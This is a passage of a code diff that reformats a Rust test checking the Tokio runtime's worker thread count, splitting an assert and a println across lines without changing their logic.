test_tokio_runtime_thread_count() { // Relax assertion - we just need to see that multiple threads CAN be used // In some test environments, fewer threads may be used, which is acceptable - assert!(thread_count >= 1 && thread_count <= 4, - "Expected 1-4 worker threads, got {}", thread_count); + assert!( + thread_count >= 1 && thread_count <= 4, + "Expected 1-4 worker threads, got {}", + thread_count + ); // Log a note if only 1 thread was used (informational, not a failure) if thread_count == 1 { - println!("Note: Only 1 thread was observed, but multi-thread runtime is configured correctly"); + println!( + "Note: Only 1 thread was observed, but multi-thread runtime is configured correctly" + ); } }